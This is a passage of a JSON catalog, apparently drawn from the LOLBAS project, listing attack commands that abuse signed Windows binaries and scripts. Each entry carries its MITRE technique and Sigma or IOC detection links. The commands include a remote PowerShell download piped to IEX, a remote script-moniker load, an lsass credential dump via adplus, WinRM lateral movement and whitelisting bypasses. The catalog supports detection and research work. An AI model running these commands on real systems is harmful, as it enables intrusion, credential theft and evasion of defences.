comspec={PATH_ABSOLUTE:.exe} & cscript c:\\windows\\system32\\manage-bde.wsf","description":"Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"]},{"id":"lolbas:manage-bde-wsf:1","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf","description":"Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"]},{"id":"lolbas:pubprn-vbs:0","toolId":"lolbas:pubprn-vbs","toolName":"Pubprn.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct}","description":"Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection","usecase":"Proxy execution","mitre":["T1216.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"toolType":"Script","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml"}],"references":["https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/","https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://github.com/enigma0x3/windows-operating-system-archaeology","https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"]},{"id":"lolbas:syncappvpublishingserver-vbs:0","toolId":"lolbas:syncappvpublishingserver-vbs","toolName":"Syncappvpublishingserver.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Inject PowerShell script code with the provided arguments","usecase":"Use Powershell host invoked from vbs script","mitre":["T1216.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://twitter.com/subTee/status/855738126882316288","https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"]},{"id":"lolbas:utilityfunctions-ps1:0","toolId":"lolbas:utilityfunctions-ps1","toolName":"UtilityFunctions.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path c:\\windows\\diagnostics\\system\\networking; import-module .\\UtilityFunctions.ps1; RegSnapin ..\\..\\..\\..\\temp\\unsigned.dll;[Program.Class]::Main()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml"}],"references":["https://twitter.com/nickvangilder/status/1441003666274668546","https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"]},{"id":"lolbas:winrm-vbs:0","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Process @{CommandLine=\"{CMD}\"} -r:http://target:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:winrm-vbs:1","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Service @{Name=\"Evil\";DisplayName=\"Evil\";PathName=\"{CMD}\"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol","usecase":"Proxy execution","mitre":["T1216"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:winrm-vbs:2","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"%SystemDrive%\\BypassDir\\cscript //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty","description":"Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.","usecase":"Execute arbitrary, unsigned code via XSL script","mitre":["T1220"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:pester-bat:0","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat [/help|?|-?|/?] \"$null; {CMD}\"","description":"Execute code using Pester. The third parameter can be anything. The fourth is the payload.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"]},{"id":"lolbas:pester-bat:1","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat ;{PATH:.exe}","description":"Execute code using Pester. Example here executes specified executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"]},{"id":"lolbas:acccheckconsole-exe:0","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code from assembly DLL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"]},{"id":"lolbas:acccheckconsole-exe:1","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code to bypass AppLocker.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"]},{"id":"lolbas:adplus-exe:0","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:1","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -c {PATH:.xml}","description":"Execute arbitrary commands using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:2","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -c {PATH:.xml}","description":"Dump process memory using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:3","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -crash -o \"{PATH_ABSOLUTE:folder}\" -sc {PATH:.exe}","description":"Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:agentexecutor-exe:0","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\" 0 1","description":"Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument","usecase":"Execute unsigned powershell scripts","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"]},{"id":"lolbas:agentexecutor-exe:1","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"{PATH_ABSOLUTE:folder}\" 0 1","description":"If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully","usecase":"Execute a provided EXE","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"]},{"id":"lolbas:applauncher-exe:0","toolId":"lolbas:applauncher-exe","toolName":"AppLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppLauncher.exe {PATH_ABSOLUTE:.exe}","description":"Launches an executable via User Experience Virtualization tool.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"]},{"id":"lolbas:appcert-exe:0","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Execute an executable file via the Windows App Certification Kit command-line tool.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"]},{"id":"lolbas:appcert-exe:1","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.","usecase":"Execute custom made MSI file with malicious code","mitre":["T1218.007"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"]},{"id":"lolbas:appvlp-exe:0","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe {PATH_SMB:.bat}","description":"Executes .bat file through AppVLP.exe","usecase":"Execution of BAT file hosted on Webdav server.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"]},{"id":"lolbas:appvlp-exe:1","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe powershell.exe -c \"$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)\"","description":"Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.","usecase":"Local execution of process bypassing Attack Surface Reduction (ASR).","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"]},{"id":"lolbas:bcp-exe:0","toolId":"lolbas:bcp-exe","toolName":"Bcp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bcp \"SELECT payload_data FROM database.dbo.payloads WHERE id=1\" queryout \"C:\\Windows\\Temp\\payload.exe\" -S localhost -T -c","description":"Export binary payload stored in SQL Server database to file system.","usecase":"Extract malicious executable from database storage to local file system for execution.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation of bcp.exe with queryout or Out parameter"},{"type":"IOC","value":"bcp.exe writing executable files to temp or users directories"},{"type":"IOC","value":"Network connections from bcp.exe to SQL Server followed by file creation"},{"type":"IOC","value":"Event ID 4688 - Process creation for bcp.exe"},{"type":"IOC","value":"Event ID 4663 - File system access by 